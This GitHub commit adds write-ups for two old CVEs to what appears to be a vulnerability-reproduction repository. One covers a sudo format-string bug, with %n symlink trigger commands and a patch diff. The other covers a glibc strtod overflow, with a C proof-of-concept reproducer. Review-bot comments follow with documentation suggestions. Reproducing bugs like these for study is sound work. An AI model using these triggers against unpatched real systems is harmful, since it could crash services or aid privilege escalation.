
add info for two CVEs

mudongliang committed May 30, 2018
1 parent c1cb081 commit 5c8dac58b872ad1fd3ccf7d869e3340de33f75f7
Showing with 125 additions and 4 deletions.
  1. +76 −1 CVE-2012-0809/README.md
  2. +25 −1 CVE-2012-3480/README.md
  3. +22 −0 CVE-2012-3480/poc.c
  4. +2 −2 README.md
@@ -1,19 +1,94 @@
# CVE/EDB ID
# CVE-2012-0809

## Experiment Environment

Ubuntu 14.04LTS

## INSTALL & Configuration

```
wget https://github.com/mudongliang/source-packages/raw/master/CVE-2012-0809/sudo-1.8.0.tar.gz
tar -xvf sudo-1.8.0.tar.gz
cd sudo-1.8.0
./configure
make
```

## Problems in Installation & Configuration


## How to trigger vulnerability

```
cd src
ln -s ./sudo %n
sudo ./%n -D9
*** %n in writable segment detected ***
```

## PoCs

[Sudo format string vulnerability](https://www.sudo.ws/sudo/alerts/sudo_debug.html)

[](http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt)

## Vulnerability Details & Patch

### Root Cause

```
void
sudo_debug(int level, const char *fmt, ...)
{
va_list ap;
char *fmt2;
if (level > debug_level)
return;
/* Backet fmt with program name and a newline to make it a single
write */
easprintf(&fmt2, "%s: %s\n", getprogname(), fmt);
va_start(ap, fmt);
vfprintf(stderr, fmt2, ap);
va_end(ap);
efree(fmt2);
}
```

Here getprogname() is argv[0] and by this user controlled. So
argv[0] goes to fmt2 which then gets vfprintf()ed to stderr. The
result is a Format String vulnerability.

### Stack Trace

### Patch

```
diff -urNa sudo-1.8.3p1/src/sudo.c sudo-1.8.3p2/src/sudo.c
--- sudo-1.8.3p1/src/sudo.c Fri Oct 21 09:01:26 2011
+++ sudo-1.8.3p2/src/sudo.c Tue Jan 24 15:59:03 2012
@@ -1208,15 +1208,15 @@
sudo_debug(int level, const char *fmt, ...)
{
va_list ap;
- char *fmt2;
+ char *buf;
if (level > debug_level)
return;
- /* Backet fmt with program name and a newline to make it a single write */
- easprintf(&fmt2, "%s: %s\n", getprogname(), fmt);
+ /* Bracket fmt with program name and a newline to make it a single write */
va_start(ap, fmt);
- vfprintf(stderr, fmt2, ap);
+ evasprintf(&buf, fmt, ap);
va_end(ap);
- efree(fmt2);
+ fprintf(stderr, "%s: %s\n", getprogname(), buf);
+ efree(buf);
}
```

## References
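Review bot: the second PoC link in the PoCs section, `[](http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt)`, has empty link text, so Markdown renders nothing and the original advisory reference disappears from the page; give it a title such as `[Full Disclosure advisory text]`. The Stack Trace and References subsections are added as empty headings, and the Patch subsection quotes a diff between sudo-1.8.3p1 and 1.8.3p2 while the INSTALL section builds sudo-1.8.0, so a sentence saying that the same sudo_debug() change applies to the 1.8.0 tree being built (or the file and line in 1.8.0) would let readers match the two. The root-cause paragraph would also read better as "getprogname() returns argv[0], which is user controlled, so argv[0] ends up in fmt2 and is passed to vfprintf() as the format string".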
@@ -1,19 +1,43 @@
# CVE/EDB ID
# CVE-2012-3480

## Experiment Environment

Ubuntu 8.10

## INSTALL & Configuration

Preinstalled environment

## Problems in Installation & Configuration


## How to trigger vulnerability

```
gcc -o poc poc.c
./poc
```

## PoCs

[GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities](https://www.exploit-db.com/exploits/37631/)

[GNU glibc Multiple Local Stack Buffer Overflow Vulnerabilities](https://www.securityfocus.com/bid/54982/exploit) misses one "#" before the 1st line

[CVE-2012-3480 glibc: Integer overflows, leading to stack-based buffer overflows in strto* related routines](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-3480)

[Bug 14459 (CVE-2012-3480) - strtod integer and buffer overflows (CVE-2012-3480)](https://sourceware.org/bugzilla/show_bug.cgi?id=14459)

## Vulnerability Details & Patch

### Root Cause

### Stack Trace

### Patch

Details are in <https://sourceware.org/ml/libc-alpha/2012-08/msg00202.html>

## References

<https://bugs.gentoo.org/431218>
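Review bot: the Root Cause and Stack Trace subsections are added as empty headings and the Patch subsection only links to the libc-alpha message, so the README never states what the bug is; a sentence summarising the linked report (the Red Hat bugzilla title already gives it: integer overflows in the strto* routines leading to stack-based buffer overflows) belongs under Root Cause. The "Preinstalled environment" line should record the glibc version that Ubuntu 8.10 ships (output of `ldd --version`), since that is the only variable deciding whether `./poc` reproduces the bug. The remark `misses one "#" before the 1st line` next to the SecurityFocus link is ambiguous; say which file and which line the missing `#` refers to.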
@@ -0,0 +1,22 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define EXPONENT "e-2147483649"
#define SIZE 214748364
int
main (void)
{
char *p = malloc (1 + SIZE + sizeof (EXPONENT));
if (p == NULL)
{
perror ("malloc");
exit (EXIT_FAILURE);
}
p[0] = '1';
memset (p + 1, '0', SIZE);
memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT));
double d = strtod (p, NULL);
printf ("%a\n", d);
exit (EXIT_SUCCESS);
}
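Review bot: poc.c carries no comment on what distinguishes a vulnerable run from a fixed one (the README only says `./poc`), so a header comment stating the expected behaviour on an affected glibc versus a patched one, and where the reproducer comes from, would make the result checkable. SIZE of 214748364 also means a malloc of about 205 MB, which is worth mentioning next to the `perror ("malloc")` branch, since on a small test VM that allocation failing is the most likely reason the PoC appears to do nothing. Minor: `free (p)` before `exit` keeps the file clean under leak checkers.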
@@ -167,9 +167,9 @@ If you encounter problems with keyword "Failed to lock files", you could try to
- [ ] CVE-2011-1137
- [ ] CVE-2011-1938
- [ ] CVE-2011-5033
- [ ] CVE-2012-0809
- [x] CVE-2012-0809
- [x] CVE-2012-2386
- [ ] CVE-2012-3480
- [x] CVE-2012-3480
- [x] CVE-2012-4409
- [x] CVE-2012-4412
- [x] CVE-2012-4424
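Review bot: the checklist marks CVE-2012-0809 and CVE-2012-3480 as done, while the README files added in this same commit leave their Stack Trace sections (and, for CVE-2012-3480, the Root Cause section) empty; either fill those in or leave the boxes unchecked until the write-ups are complete so the list stays a reliable progress tracker.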
